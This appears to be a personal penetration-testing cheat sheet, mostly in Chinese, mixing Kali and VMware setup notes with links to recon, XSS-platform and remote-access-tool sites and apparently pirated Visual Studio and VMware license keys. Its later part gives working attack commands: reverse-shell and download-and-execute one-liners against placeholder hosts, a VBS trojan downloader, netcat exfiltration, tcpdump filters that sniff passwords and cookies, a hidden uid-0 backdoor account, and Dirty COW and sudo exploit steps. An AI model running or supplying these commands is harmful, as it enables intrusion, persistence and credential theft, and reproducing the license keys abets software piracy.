ufw allow 22
ufw delete allow 22
ufw enable
ufw disable
ufw status
seq -w 0000 9999 >list.txt //生成4位数字列表0000-9999
seq 10080 10089 >list.txt //生成5位固定格式数字列表10080-10089
- https://www.vultr.com/
- https://my.racknerd.com/
- https://www.dynu.com/
- https://www.gmail.com/
- https://contabo.com/de/
- https://ngrok.com/
- https://localtonet.com/
- https://localxpose.io/
- http://localhost.run/
- https://rport.io/
- https://duckduckgo.com/?q=DuckDuckGo+AI+Chat&ia=chat&duckai=1
- https://soundcloud.com/
- https://motrix.app/zh-CN/download
- https://www.gopeed.com/zh-CN
- https://www.alibabacloud.com/help/zh/oss/developer-reference/common-tools/?spm=a2c63.p38356.0.0.438719ed6533xG
- https://s3browser.com/
- https://chromewebstore.google.com/detail/instant-data-scraper/ofaokhiedipichpaobibbnahnkdoiiah
- https://chromewebstore.google.com/detail/modheader-modify-http-hea/idgpnmonknjnojddfkpgkljpfnnfcklj
- https://chromewebstore.google.com/detail/wappalyzer-technology-pro/gppongmhjkpfnbhagpmjfkannfbllamg
- https://chromewebstore.google.com/detail/%E8%BA%AB%E4%BB%BD%E9%AA%8C%E8%AF%81%E5%99%A8/bhghoamapcdpbohphigoooaddinpkbai
- https://chromewebstore.google.com/detail/shodan/jjalcfnidlmpjhdfepjhjbhnhkbgleap
- https://chromewebstore.google.com/detail/proxy-switchyomega/padekgcemlokbadohgkifijomclgjgif
- https://chromewebstore.google.com/detail/json-formatter/bcjindcccaagfpapjjmafapmmgkkhgoa
- https://chromewebstore.google.com/detail/%E7%AF%A1%E6%94%B9%E7%8C%B4/dhdgffkkebhmkfjojejmpbldmpobfkfo
- https://chromewebstore.google.com/detail/trufflehog/bafhdnhjnlcdbjcdcnafhdcphhnfnhjc
- https://chromewebstore.google.com/detail/foxyproxy/gcknhkkoolaabfmlnjonogaaifnjlfnp
- https://crt.sh/
- https://otx.alienvault.com/
- https://www.zoomeye.org/
- https://www.shodan.io/
- https://beta.shodan.io/search/filters
- https://search.censys.io/
- https://fofa.info/
- https://www.startpage.com/
- https://www.greynoise.io/
- https://www.criminalip.io/
- https://www.onyphe.io/
- https://viz.greynoise.io/
- https://publicwww.com/
- https://natlas.io/
- https://www.qwant.com/
- https://rapiddns.io/
- https://dnsdumpster.com/
- https://www.virustotal.com/gui/home/search
- https://domainbigdata.com/
- https://www.robtex.com/cidr/
- https://zh-hans.ipshu.com/
- https://www.skymem.info/
- https://antiscan.me/
- https://www.virustotal.com/
- https://any.run/
- https://www.joesandbox.com/
- https://www.hybrid-analysis.com/
- https://sploitus.com/
- https://www.phrozen.io/
- https://unprotect.it/techniques/
- https://purecoder.io/description/purerat.html
- https://hashes.com/
- https://passwordrecovery.io/
- https://weakpass.com/
- https://share.blandyuk.co.uk/apps/
- https://book.hacktricks.xyz/
- https://ppn.snovvcrash.rocks/
- https://kashz.gitbook.io/kashz-jewels/
- https://ed4m4s.blog/
- https://docs.h4rithd.com/
- https://wiki.bylibrary.cn/
- https://forum.ywhack.com/bountytips.php
- https://exploit-notes.hdks.org/
- https://github.com/PeiQi0/PeiQi-WIKI-Book
- https://wiki.teamssix.com/
- https://wiki.wgpsec.org/
- https://vulbase.vercel.app/qingy/
- https://www.cobalt.io/blog/author/busra-demir
- https://www.onsecurity.io/blog/file-upload-checklist/
- https://wiki.bafangwy.com/doc/323/
- https://www.x86matthew.com/view_post?id=embed_exe_lnk
- https://xss.report/
- https://bxsshunter.com/
- https://github.com/mandatoryprogrammer/xsshunter-express
- https://github.com/kleiton0x00/XSScope
- https://github.com/kagurazakasanae/SuperXSS
- https://github.com/AntSwordProject/ant
- https://github.com/Yeuoly/FxxkXSS
- https://github.com/thatsn0tmysite/xsserve
- https://www.freelancer.is/
- https://www.freelancer.com/projects/CPlusPlus-Programming-Computer-Security/Remote-Administration-Tool-RAT/details
- https://www.indetectables.net/
- https://www.enelpc.com/p/larrylurexrat.html
- https://www.torproject.org/download/
- https://bridges.torproject.org/bridges
- https://tb-manual.torproject.org/zh-CN/bridges/
- https://cursor.com/
- https://wpd.app/
- https://www.ventoy.net/cn/
- https://www.kahusecurity.com/tools.html
- https://www.komodolabs.com/ip-scanner/
- https://data.page/
- https://yaklang.io/
- https://gobysec.net/
- https://xray.cool/
- https://stack.chaitin.com/tool/detail/1036
- https://stack.chaitin.com/tool/detail/2
- https://tanggo.nosugar.tech/
- https://securityxploded.com/
- https://mirrors.huaweicloud.com/home
- http://www.nirsoft.net/
- https://sysin.org/
- https://breakingsecurity.net/
- https://nssm.cc/download
- https://www.kahusecurity.com/
- https://forums.mydigitallife.net/
- https://www.colasoft.com.cn/
- https://download.xshell.com/27397819/Xmanager-7.0.0112.exe
- https://www.roxybrowser.com/zh
- https://offsec.tools/
- https://www.ventoy.net/cn/isolist.html
- https://xubuntu.org/news/introducing-xubuntu-core/
- https://unit193.net/xubuntu/core/
- https://www.slax.org/
- https://www.linux-live.org/
- https://help.zorin.com/docs/hardware/activate-amd-radeon-drivers/
- https://www.wps.com/office/linux/
- https://www.cnblogs.com/guochaoxxl/p/11619260.html
- https://www.ubuntukylin.com/applications/
- https://www.slax.org/blog/27433-Releasing-Slax-15-0-based-on-Slackware-again-after-9-years-and-11-4-based-on-Debian.html
- https://www.dwarmstrong.org/minimal-debian/
- https://cdimage.debian.org/debian-cd/current/amd64/iso-cd/debian-11.6.0-amd64-netinst.iso
- https://www.gooneyryan.com/archives/828
- http://xlunch.org/
- https://wiki.debian.org/FluxBox
- https://itnext.io/how-to-create-a-custom-ubuntu-live-from-scratch-dd3b3f213f81
- https://groups.google.com/forum/#!forum/slax-users
- https://blog.csdn.net/weixin_44071721/article/details/117035899
- https://www.jianshu.com/p/9d44e3b98930
- https://www.debian.org/doc/manuals/debian-reference/
- https://blog.csdn.net/seaship/article/details/86286572
- https://medium.com/source-words/how-to-manually-install-update-and-uninstall-fonts-on-linux-a8d09a3853b0
- https://groups.google.com/g/slax-users/c/ysmA6JNH-4U
- https://shixiongfei.com/debian-chinese.html
- https://www.slax.org/blog/19525-International-support-for-Slax.html
- https://silentming.net/blog/2015/11/16/add-chinese-in-english-debian/
- https://shixiongfei.com/debian-chinese.html
- https://sysdl132.github.io/blogcc/2021/03/29/livecd.html
- https://github.com/mvallim/live-custom-ubuntu-from-scratch
- https://support.apple.com/zh-cn/HT211814
- https://sysin.org/blog/macos-installer-damaged/
- https://sysin.org/blog/how-to-install-macos/
- https://portswigger.net/burp/releases/professional-community-2021-12
- https://macoshome.com/macos/17094.html
- https://kb.vmware.com/s/article/83098
- https://www.pethuraj.com/blog/use-burpsuite-like-a-pro-part-1/
- https://www.ceos3c.com/security/burp-suite-tutorial-made-easy/#:~:text=Burp%20Suite%20Tutorial%20%E2%80%93%20Get%20started%20with%20Burp,term%20...%208%20Using%20the%20Spider%20...%20%E6%9B%B4%E5%A4%9A%E9%A1%B9%E7%9B%AE
- https://www.arridae.com/blogs/setting-up-an-android-pt-environment.php
- https://www.pluralsight.com/courses/web-application-penetration-testing-with-burp-suite
- https://tryhackme.com/module/learn-burp-suite
- https://r0yanx.com/2022/05/10/%E5%9F%BA%E4%BA%8E%E6%B5%8F%E8%A7%88%E5%99%A8%E7%9A%84%E5%8F%A3%E4%BB%A4%E6%9A%B4%E7%A0%B4/
- https://www.vmware.com/cn/products/workstation-pro/workstation-pro-evaluation.html
- https://www.vmware.com/cn/products/fusion/fusion-evaluation.html
- https://www.vmware.com/products/workstation-player/workstation-player-evaluation.html
- https://docs.vmware.com/cn/VMware-Workstation-Pro/index.html
- https://download3.vmware.com/software/WKST-1625-WIN/VMware-workstation-full-16.2.5-20904516.exe
XKZYV-PK9CC-A1Y0X-K5HZL-Y65ZV
7HYY8-Z8WWY-F1MAN-ECKNY-LUXYX
ZTVXW-VRAG9-D1WUR-XLQCT-VV5XX
G0ZQR-GRGYE-G1V8Z-AT9E0-6KNGV
RHZP8-V2QKE-Z1ZPQ-QFUET-Q7QZZ
FY102-4UF13-088AP-KWWGZ-WLKW2
ZV30K-66Z8K-M84VY-0DMZG-NG88D
GG352-DMD01-481TQ-NEQQC-QGK96
ZG70H-80F9L-489QP-ZYPQE-X20Y2
AZ3EH-6PD8N-08D1Q-3DWZZ-XPHUA
VY780-A7XE6-0806P-LWM7T-ZPUV6
YZ718-4REEQ-08DHQ-JNYQC-ZQRD0
ZF3R0-FHED2-M80TY-8QYGC-NPKYF
YF390-0HF8P-M81RQ-2DXQE-M2UT6
ZF71R-DMX85-08DQY-8YMNC-PPHV8
- http://mirrors.ustc.edu.cn 是 Debian, Ubuntu, Fedora, Archlinux, CentOS 等多个发行版的官方源和 Debian 在中国的官方镜像。
- https://mirrors.tuna.tsinghua.edu.cn/ 是 Debian, Ubuntu, Fedora, Archlinux, CentOS 等多个发行版的官方源和 Debian 在中国的官方镜像。
- http://old.kali.org/ kali老版本官方镜像
- https://cdimage.kali.org/kali-images/ kali官方镜像
- http://isoredirect.centos.org/altarch/ CentOS官方镜像
- https://archive.kernel.org/centos-vault/ CentOS官方镜像
- https://vault.centos.org/ CentOS官方镜像
- https://cdimage.debian.org/mirror/cdimage/archive/ Debian官方镜像
- https://releases.ubuntu.com/ Ubuntu官方镜像
- https://www.freebsd.org/where.html FreeBSD官方镜像
- https://developers.redhat.com/products/rhel/download RedHat官方镜像,需要登录后下载
- http://ba.mirror.garr.it/mirrors/backbox/ BackBox官方镜像
- https://backbox.oversecurity.net/downloads/ BackBox官方镜像
systemctl enable ssh.service //开启SSH服务开机启动
nano /etc/ssh/sshd_config //允许root登录,修改以下两项(注意:这会允许 root 凭密码从网络登录,生产环境应保留默认值并改用密钥认证)
#PermitRootLogin prohibit-password
PermitRootLogin yes
#PasswordAuthentication yes
PasswordAuthentication yes
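#!/bin/bash
# Restart the VMware guest-tools stack from inside the guest: take down the
# vmblock FUSE mount and any running vmtoolsd, then bring both back up.
#
# The mount unit is named run-vmblock\x2dfuse.mount: systemd escapes "-" in a
# mount path as "\x2d", so the backslash is part of the unit name. Single
# quotes keep it literal (the unquoted form needs "\\x2d" to survive the shell).
unit='run-vmblock\x2dfuse.mount'

systemctl stop "$unit"
killall -q -w vmtoolsd          # -q: no complaint if not running; -w: wait for exit
systemctl start "$unit"
systemctl enable "$unit"
# Error output from the tools binaries is discarded on purpose; they are noisy
# when run outside a desktop session.
vmware-user-suid-wrapper vmtoolsd -n vmusr 2>/dev/null
vmtoolsd -b /var/run/vmroot 2>/dev/null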
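#!/bin/bash
# Mount every VMware shared folder exported to this guest under /mnt/hgfs/<name>.
# vmware-hgfsclient prints one share name per line; IFS= and read -r keep
# leading/trailing whitespace and backslashes in a name intact.
vmware-hgfsclient | while IFS= read -r folder; do
  [[ -n "$folder" ]] || continue    # skip blank lines from the client
  mnt="/mnt/hgfs/${folder}"
  printf '[i] Mounting %s (%s)\n' "$folder" "$mnt"
  mkdir -p "$mnt"
  # A stale mount left from an earlier session would make the new mount fail;
  # the error is ignored when nothing is mounted there.
  umount -f "$mnt" 2>/dev/null
  # allow_other: non-root users may access the share; auto_unmount: the mount
  # goes away with the FUSE process.
  vmhgfs-fuse -o allow_other -o auto_unmount ".host:/${folder}" "$mnt"
done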
sleep 2s
1.首先把kali虚拟机的网络适配器更改为桥接模式直连物理网络。
2.查看自己主机的(是自己真实电脑的不是虚拟机)ip地址,网关,网段。
3.修改nano /etc/network/interfaces文件,添加如下内容
auto eth0 //自动启动eth0网卡
iface eth0 inet static //静态获取IP
address x.x.x.x //固定ip地址,根据实际情况填写
netmask x.x.x.x //子网掩码,根据实际情况填写
gateway x.x.x.x //网关,根据实际情况填写
4.修改nano /etc/resolv.conf文件添加dns
nameserver 114.114.114.114
nameserver 8.8.8.8
5.重启系统或/etc/init.d/networking restart或systemctl restart networking.service重启网络服务
由于Kail Linux没有回收站图标。可以使用命令行方式清理回收站。
sudo rm -rf ~/.local/share/Trash/*
https://www.oracle.com/in/java/technologies/downloads/ // 下载jdk8
sudo mkdir -p /usr/lib/jvm //为 JDK 创建一个目录
sudo tar zxvf jdk-version-linux-x64.tar.gz -C /usr/lib/jvm //提取 tarball 并安装 JDK
sudo update-alternatives --install "/usr/bin/java" "java" "/usr/lib/jvm/jdk1.8.0_version/bin/java" 1 //告诉系统有可用的新 Java 版本
注意:如果从手动删除的先前版本更新,请执行上述命令两次,因为第一次会收到错误消息。
sudo update-alternatives --set java /usr/lib/jvm/jdk1.8.0_version/bin/java //将新JDK设置为默认值
sudo update-alternatives --config java //jdk多版本切换
- https://mac.getutm.app/
- https://github.com/ninxsoft/Mist
- https://github.com/ninxsoft/mist-cli
- https://communities.vmware.com/t5/VMware-Fusion-Discussions/macOS-13-Ventura-VM-Intel/td-p/2913104
# mist (https://github.com/ninxsoft/mist-cli) helpers for fetching
# macOS firmware and installers. Every download uses the same output-name
# template; mist fills in %NAME%, %VERSION% and %BUILD% itself.
name_tpl='Install-%NAME%-%VERSION%-%BUILD%'

# Firmware (IPSW) available for Apple Silicon Macs.
mist list firmware

# Installers for Intel Macs; Big Sur and later are universal, so they are
# listed here as well.
mist list installer

# Latest "macOS Ventura" firmware for Apple Silicon, saved under a custom name.
mist download firmware "macOS Ventura" --firmware-name "${name_tpl}.ipsw"

# Installer pinned to version 13.0.1 (Intel / universal), packaged as a disk
# image with the same naming scheme.
mist download installer "13.0.1" image --image-name "${name_tpl}.dmg"

# The same pinned version, packaged as a bootable ISO instead.
mist download installer "13.0.1" iso --iso-name "${name_tpl}.iso"
- https://reverse-shell.sh/
- https://www.revshells.com/
- https://gtfobins.github.io/
- https://lolbas-project.github.io/
- https://www.hackingarticles.in/category/red-teaming/page/2/
- https://cyber-security.tk/exploit/Linux-Privilege-Escalation/
- https://cyber-security.tk/exploit/Windows-Privilege-Escalation/
- https://juggernaut-sec.com/category/windows-privilege-escalation/
- https://juggernaut-sec.com/category/linux-privilege-escalation/
- https://book.hacktricks.xyz/linux-hardening/privilege-escalation
- https://www.cmd5.com/
- https://www.somd5.com/
- https://hashes.com/zh/decrypt/hash
- https://encode-decode.com/
- https://hashcat.net/hashcat/
- https://www.cpubenchmark.net/cpu_value_available.html
- https://www.videocardbenchmark.net/mid_range_gpus.html
- https://www.stationx.net/how-to-use-hashcat/
- https://asecuritysite.com/subjects/chapter104
- https://bowneconsultingcontent.com/pub/EH/proj/H520.htm
- https://developer.nvidia.com/cuda-toolkit-archive
- https://docs.nvidia.com/cuda/cuda-toolkit-release-notes/index.html#cuda-major-component-versions
- https://miloserdov.org/?p=7501
- 下载并解压 CUDA 安装包,在 cuda_12.6.0_560.76_windows\cuda_nvrtc\nvrtc\bin 目录中把 nvrtc64_120_0.dll、nvrtc-builtins64_126.dll 复制到 hashcat 目录即可
- hashcat -I 列出可用的设备
- hashcat -d 1 -m <hash_type> <hash_file> 选择特定的显卡
- hashcat -d 1,2 -m <hash_type> <hash_file> 使用多个显卡
- https://www.openwall.com/john/
- https://n-etupirka.net/entry/2022/11/30/184339
- https://kalitut.com/john-the-ripper/
- https://hackyourmom.com/en/servisy/soft/povnyj-posibnyk-z-john-the-ripper-ch-1-znajomstvo-ta-vstanovlennya-john-the-ripper/
- https://note.com/mkse/n/n4411674ebda4
- https://www.jsjiami.com/
- https://okjson.608558.com/encrypt/openssl_encode
- https://www.devglan.com/online-tools/triple-des-encrypt-decrypt
- http://tool.chacuo.net/cryptrijndael
- https://www.javainuse.com/aesgenerator
- https://www.win-rar.com/fileadmin/winrar-versions/sc/sc20220317/rrlb/winrar-x64-611sc.exe
- https://www.win-rar.com/fileadmin/winrar-versions/sc/sc20220317/rrlb/winrar-x32-611sc.exe
- Chrome
%APPDATA%/../Local/Google/Chrome/User Data/Default/Extensions
- Edge
%APPDATA%/../Local/Microsoft/Edge/User Data/Default/Extensions
- https://www.oracle.com/java/technologies/downloads/#java8
- https://www.oracle.com/java/technologies/downloads/archive/
- https://www.oracle.com/java/technologies/javase/javase8u211-later-archive-downloads.html
- https://www.oracle.com/java/technologies/javase/jdk11-archive-downloads.html
- https://www.openlogic.com/openjdk-downloads
- https://repo.huaweicloud.com/java/jdk/8u202-b08/
javap -verbose Sample.class | grep major //Linux、MacOS
javap -verbose Sample.class | findstr major //Windows
- 点击【系统变量】下面的【新建】按钮,然后直接在变量名输入
JAVA_HOME,变量值为JAVA JDK的安装目录
- 然后双击系统变量Path,添加JAVA的安装bin目录进去。点击【新建】,输入
%JAVA_HOME%\bin
python 2.7.9 版默认自带 pip
https://www.python.org/ftp/python/2.7.9/python-2.7.9.amd64.msi
https://www.python.org/ftp/python/3.10.7/python-3.10.7-amd64.exe
要自动将 test.py 中需要的模块打包到 requirements.txt 文件中,可以使用 pipreqs,它会生成一个 requirements.txt 文件,其中包含 test.py 中使用的所有模块及其版本
# Generate requirements.txt from the imports actually used in this directory,
# then install them into a fresh virtual environment.
pip install pipreqs
pipreqs . --force               # --force: overwrite an existing requirements.txt

python3 -m venv venv
. venv/bin/activate             # same as `source`; only affects the current shell
pip install -r requirements.txt
匹配32位MD5的正则表达式:[a-zA-Z0-9]{32} (MD5 摘要只含十六进制字符,严格匹配可用 [a-fA-F0-9]{32})
匹配双字节字符(包括汉字在内):[^\x00-\xff]
匹配删除空行:^[ \t]*\n
匹配首尾空白字符的正则表达式:^\s*|\s*$
IP地址:([0-9]{1,3})\.([0-9]{1,3})\.([0-9]{1,3})\.([0-9]{1,3})
匹配Email地址的正则表达式:\w+([-+.]\w+)*@\w+([-.]\w+)*\.\w+([-.]\w+)*
匹配手机号:[1](([3][0-9])|([4][5-9])|([5][0-3,5-9])|([6][5,6])|([7][0-8])|([8][0-9])|([9][1,8,9]))[0-9]{8}
删除查找替换记录:若要清空,就直接按住Alt+Del不松,便可清空查找历史
清除emeditor打开记录:点“工具”->“自定义”,然后在弹出的窗口中点“历史”,再点“清除历史”
[一-龥] //匹配中文
.sln 文件的标头如下所示:
Microsoft Visual Studio Solution File, Format Version 12.00
# Visual Studio Version 16
VisualStudioVersion = 16.0.28701.123
MinimumVisualStudioVersion = 10.0.40219.1
定义
Microsoft Visual Studio Solution File, Format Version 12.00
定义文件格式版本的标准标头。
# Visual Studio Version 16
最近一次保存该文件的 Visual Studio 版本。此信息控制解决方案图标中的版本号。
VisualStudioVersion = 16.0.28701.123
最近一次保存该文件的 Visual Studio 完整版本号。如果解决方案文件由主版本相同的较新 Visual Studio 保存,此值不会更新,以减少该文件中的改动。
MinimumVisualStudioVersion = 10.0.40219.1
能够打开此解决方案的 Visual Studio 最低版本。
MSVC++ 6.0 _MSC_VER == 1200 (Visual Studio 6.0 version 6.0)
MSVC++ 7.0 _MSC_VER == 1300 (Visual Studio .NET 2002 version 7.0)
MSVC++ 7.1 _MSC_VER == 1310 (Visual Studio .NET 2003 version 7.1)
MSVC++ 8.0 _MSC_VER == 1400 (Visual Studio 2005 version 8.0)
MSVC++ 9.0 _MSC_VER == 1500 (Visual Studio 2008 version 9.0)
MSVC++ 10.0 _MSC_VER == 1600 (Visual Studio 2010 version 10.0)
MSVC++ 11.0 _MSC_VER == 1700 (Visual Studio 2012 version 11.0)
MSVC++ 12.0 _MSC_VER == 1800 (Visual Studio 2013 version 12.0)
MSVC++ 14.0 _MSC_VER == 1900 (Visual Studio 2015 version 14.0)
MSVC++ 14.1 _MSC_VER == 1910 (Visual Studio 2017 version 15.0)
MSVC++ 14.2 _MSC_VER == 1920 (Visual Studio 2019 Version 16.0)
MSVC++ 14.3 _MSC_VER == 1930 (Visual Studio 2022 Version 17.0)
Visual Studio Professional 2010 YCFHQ-9DWCY-DKV88-T2TMH-G7BHP
Visual Studio Professional 2012 4D974-9QX42-9Y43G-YJ7JG-JDYBP
Visual Studio Professional 2013 XDM3T-W3T3V-MGJWK-8BFVD-GVPKY
Visual Studio Professional 2015 HMGNV-WCYXV-X7G9W-YCX63-B98R2
Visual Studio Professional 2017 KBJFW-NXHK6-W4WJM-CRMQB-G3CDH
Visual Studio Professional 2019 NYWVH-HT4XC-R2WYW-9Y3CM-X4V3Y
Visual Studio Professional 2022 TD244-P4NB7-YQ6XK-Y8MMM-YWV2J
- https://pystyle.info/setup-qt-development-environment-on-windows/
- https://blog.csdn.net/jiaolu295/article/details/116116186
- https://github.com/mandatoryprogrammer/xsshunter-express
- https://github.com/mandatoryprogrammer/xsshunter
- https://github.com/mandatoryprogrammer/CursedChrome
- https://github.com/XShar/XssBot
- https://github.com/kagurazakasanae/SuperXSS
- https://github.com/tempbottle/xssPlatform
- https://github.com/Yeuoly/FxxkXSS
- https://github.com/ssl/ezXSS
- https://github.com/LewisArdern/bXSS
- https://github.com/kleiton0x00/XSScope
- https://github.com/portcullislabs/xssshell-xsstunnel
./gost -L=:1080 //作为标准HTTP/SOCKS5代理
./gost -L=admin:123456@:1080 //设置代理认证信息
./gost -L=http2://:443 -L=socks5://:1080 -L=ss://aes-128-cfb:123456@:8338 //多端口监听
nohup ./gost -L=:1080 > /dev/null 2>&1 & //后台运行不记录日志
nssm.exe install
Path:选择gost.exe
Startup directory:自动添加路径地址
Arguments:参数设置-L=:1080
Service name:设置gost 点击Install service
nssm.exe start gost
nssm.exe edit gost
./ngrok tcp 192.168.0.225:445
nohup python s5.py 1080 & //后台运行s5.py
nohup ./ngrok tcp 1080 -log=stdout & //后台运行ngrok,此处必须加入-log=stdout参数
./ngrok tcp 1080 -config /tmp/.ngrok2/ngrok.yml
curl https://reverse-shell.sh/yourip:1337 | sh
or
while true; do curl https://reverse-shell.sh/yourip:1337 | sh; done
echo base64后的木马内容 |base64 -d > 360.jsp
nc -l 23456 | tar xvzf - // 本地监听和接受文件
tar cvzf - "文件名或者目录" | nc x.x.x.x 23456 // 压缩文件或目录传输
或
nc -l -p 4444 < /tool/file.exe //本地发送
nc $ATTACKER 4444 > file.exe //远程接受
python2的用法如下:
python -m SimpleHTTPServer
python3的用法如下:
python3 -m http.server --cgi
以上两种方法默认端口8000,可以指定端口,例如指定端口45678:
python -m SimpleHTTPServer 45678
python3 -m http.server --cgi 45678
在命令的开头加一个nohup,忽略所有的挂断信号,如果当前bash关闭,则当前进程会挂载到init进程下,成为其子进程,这样即使退出当前用户,其45678端口也可以使用。
nohup python -m SimpleHTTPServer 45678 &
python -m pyftpdlib -p 2121 //开启简单ftp功能
wget http://soft.vpser.net/web/nginx/nginx-0.8.0.tar.gz //文件下载
wget -c http://soft.vpser.net/web/nginx/nginx-0.8.0.tar.gz //断点续传
wget -b http://soft.vpser.net/web/nginx/nginx-0.8.0.tar.gz //后台下载
wget -O /home/ http://soft.vpser.net/web/nginx/nginx-0.8.0.tar.gz //文件另存为(文件名或路径)
wget --http-user=youuser --http-passwd=youpassword http://soft.vpser.net/web/nginx/nginx-0.8.0.tar.gz //基础认证
wget --no-check-certificate https://soft.vpser.net/web/nginx/nginx-0.8.0.tar.gz //https协议下载
wget -c -r -np -k -L -p http://soft.vpser.net/web/ //全站web目录下载
curl -O https://nchc.dl.sourceforge.net/project/ssocks/ssocks-0.0.14.tar.gz //将文件保存到本地
curl -k -O https://nchc.dl.sourceforge.net/project/ssocks/ssocks-0.0.14.tar.gz //下载https的网站将文件保存到本地
curl -o ssocks.tar.gz https://nchc.dl.sourceforge.net/project/ssocks/ssocks-0.0.14.tar.gz //将文件保存到本地并保存为ssocks.tar.gz
curl -C - https://nchc.dl.sourceforge.net/project/ssocks/ssocks-0.0.14.tar.gz //断点续传下载文件
scp -P 2222 [email protected]:/root/lnmp0.4.tar.gz /home/lnmp0.4.tar.gz //获取远程服务器上的文件
scp -P 2222 -r [email protected]:/root/lnmp0.4/ /home/lnmp0.4/ //获取远程服务器上的目录
scp -P 2222 /home/lnmp0.4.tar.gz [email protected]:/root/lnmp0.4.tar.gz //将本地文件上传到服务器上
scp -P 2222 -r /home/lnmp0.4/ [email protected]:/root/lnmp0.4/ //将本地目录上传到服务器上
-P(大写)为端口参数,2222 表示更改后的SSH端口,如果没有更改SSH端口可以不用添加该参数。-r 参数表示递归复制(即复制该目录下面的文件和目录)
[email protected] 表示使用root用户登录远程服务器www.vpser.net,:/root/lnmp0.4/ 表示远程服务器上的目录
下载执行
curl -A O -o- -L http://x.x.x.x/a | bash -s
脚本代码
mkdir /tmp/.qHFnC; rm -f /tmp/.qHFnC/uiRaBszrxF; curl -A O -L http://x.x.x.x/pKfsMhgjeh -o /tmp/.qHFnC/uiRaBszrxF; chmod 755 /tmp/.qHFnC/uiRaBszrxF; /tmp/.qHFnC/uiRaBszrxF; sleep 20; rm -rf /tmp/.qHFnC/uiRaBszrxF
上传
curl -k --upload-file 文件 https://transfer.sh/文件名
curl -k --upload-file /root/hello.txt https://transfer.sh/hello.txt
下载
https://transfer.sh/get/1TghfFb/hello.txt
ftp -i -n <<!
open 10.x.x.x
user yourFtpAccount yourPasswd
cd /root/DailyBuild/webapps/
delete xxx.war
lcd /home/product/1.0.2-SNAPSHOT/webapps
binary
mput xxx.war
bye
!
echo Set Post = CreateObject("Msxml2.XMLHTTP") >>zl.vbs
echo Set Shell = CreateObject("Wscript.Shell") >>zl.vbs
echo Post.Open "GET","http://x.x.x.x/muma.exe",0 >>zl.vbs
echo Post.Send() >>zl.vbs
echo Set aGet = CreateObject("ADODB.Stream") >>zl.vbs
echo aGet.Mode = 3 >>zl.vbs
echo aGet.Type = 1 >>zl.vbs
echo aGet.Open() >>zl.vbs
echo aGet.Write(Post.responseBody) >>zl.vbs
echo aGet.SaveToFile "c:\zl.exe",2 >>zl.vbs
echo wscript.sleep 1000 >>zl.vbs
echo Shell.Run ("c:\zl.exe") >>zl.vbs
执行C:>cscript zl.vbs
cmd.exe /c bitsadmin /transfer f370 http://x.x.x.x/as %APPDATA%\f370.exe&%APPDATA%\f370.exe&del %APPDATA%\f370.exe
certutil.exe -urlcache -split -f https://x.x.x.x/version.txt file.txt
HH.exe http://x.x.x.x/test.exe c:\\test.exe //适用于sqltools
tcpdump -i eth1 -s0 -w tcpdump.pcap //指定网卡,-s0会将大小设置为无限制-如果您要捕获所有流量,请使用此大小。如果要从网络流量中提取二进制文件/文件,则需要。-w保存文件
tcpdump -i eth1 src host 192.168.1.1 -w tcpdump.pcap //指定源地址
tcpdump -i eth1 dst host 192.168.1.1 -w tcpdump.pcap //指定目的地址
tcpdump -i eth1 port 25 -w tcpdump.pcap //抓取所有经过 eth1,目的或源端口是 25 的网络数据
tcpdump -i eth1 -s 0 -A -vv 'tcp[((tcp[12:1] & 0xf0) >> 2):4] = 0x47455420' -w tcpdump.pcap //抓取get请求
tcpdump -i eth1 -s 0 -A -vv 'tcp[((tcp[12:1] & 0xf0) >> 2):4] = 0x504f5354' -w tcpdump.pcap //抓取post请求
tcpdump -i eth1 -nn -A -s0 -l -w tcpdump.pcap | egrep -i 'Set-Cookie|Host:|Cookie:' //抓取cookie
tcpdump -i eth1 -s 0 -A -n -l -w tcpdump.pcap | egrep -i "POST /|GET /|pwd=|passwd=|password=|os_password=|user[password]=|Host:" //抓取post/get明文密码
tcpdump -p -vv -s 0 -w tcpdump.pcap //不指定网卡嗅探
tcpdump -i any -s 0 -w tcpdump.pcap //当机器有多个网卡,不确定流量走哪个时,使用这个选项
tcpdump -r <input_pcap> -w <output_pcap> -C <file_size> //input_pcap是您要拆分的文件的名称,output_pcap是输出,而<file_size>是拆分文件的近似大小以兆字节为单位。
tcpdump -r input_packet_capture.pcap -w output_packet_capture.pcap -C 25 //将文件拆分为约25mb的块
- https://apackets.com/
- https://www.netresec.com/?page=NetworkMiner
- https://www.colasoft.com.cn/
- https://www.wireshark.org/
{{% notice tip %}} 内网机器提权添加账户,无回显,设置密码就不好弄,下面就是添加一个root级别的账户并设置密码的命令 {{% /notice %}}
useradd -p `openssl passwd -1 -salt 'lsof' admin` -u 0 -o -g root -G root -s /bin/bash -d /usr/bin/lsof lsof
// 命令解释
useradd 添加用户
-p `openssl passwd -1 -salt 'lsof' admin` 这个里面的指的是设置用户的密码,里面的lsof差不多是密钥之类的,可以随便写, admin是明文密码
-u 0 -o 添加一个uid为 0的用户 就相对于root级别的了
-g root -G root 将用户添加到root组
-s /bin/bash 指定新建用户的shell路径
-d /usr/bin/lsof 新建用户的主目录,可以自己定义
lsof 新建的用户的用户名
curl -O https://access.redhat.com/sites/default/files/rh-cve-2016-5195_3.sh && chmod +x rh-cve-2016-5195_3.sh
./rh-cve-2016-5195_3.sh && rm -f rh-cve-2016-5195_3.sh //脏牛漏洞检测
或
curl -O https://raw.githubusercontent.com/aishee/scan-dirtycow/master/dirtycowscan.sh && chmod +x dirtycowscan.sh
./dirtycowscan.sh && rm -f dirtycowscan.sh //脏牛漏洞检测,适用redhat、ubuntu等
curl -O https://raw.githubusercontent.com/FireFart/dirtycow/master/dirty.c //下载
gcc -pthread dirty.c -o dirty -lcrypt //编译
./dirty or ./dirty my-new-password //运行,默认账号firefart
python -c 'import pty; pty.spawn("/bin/bash")' //获得标准交互式shell
su firefart //交互式登陆
mv /tmp/passwd.bak /etc/passwd //提权添加后门后还原/etc/passwd
curl -O https://access.redhat.com/sites/default/files/cve-2021-3156--2021-02-01-1206.sh && chmod +x cve-2021-3156--2021-02-01-1206.sh
./cve-2021-3156--2021-02-01-1206.sh && rm -f cve-2021-3156--2021-02-01-1206.sh
访问exp
https://github.com/blasty/CVE-2021-3156
Linux kernel versions from 2.4.4 to 2.4.37.4, and from 2.6.0 to 2.6.30.4
gcc -Wall -o linux-sendpage linux-sendpage.c //i386
gcc -Wall -m64 -o linux-sendpage linux-sendpage.c //x86_64
wget --no-check-certificate https://github.com/gbonacini/CVE-2016-5195/archive/master.zip //下载
unzip master.zip && cd CVE-2016-5195-master/
make //编译
./dcow -h //查看帮助说明
